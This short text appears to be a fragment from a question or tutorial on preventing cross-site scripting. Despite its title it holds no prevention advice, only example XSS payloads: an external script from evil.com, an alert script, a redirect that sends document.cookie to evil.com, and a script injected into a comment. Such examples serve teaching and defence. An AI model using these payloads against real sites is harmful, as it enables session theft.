how to prevent cross site scripting to redirect you to another web page

<!-- External script -->
<script src=http://evil.com/xss.js></script>
<!-- Embedded script -->
<script> alert("XSS"); </script>

<script>
window.location="http://evil.com/?cookie=" + document.cookie
</script>

<html>
<h1>Most recent comment</h1>
<script>doSomethingEvil();</script>
</html>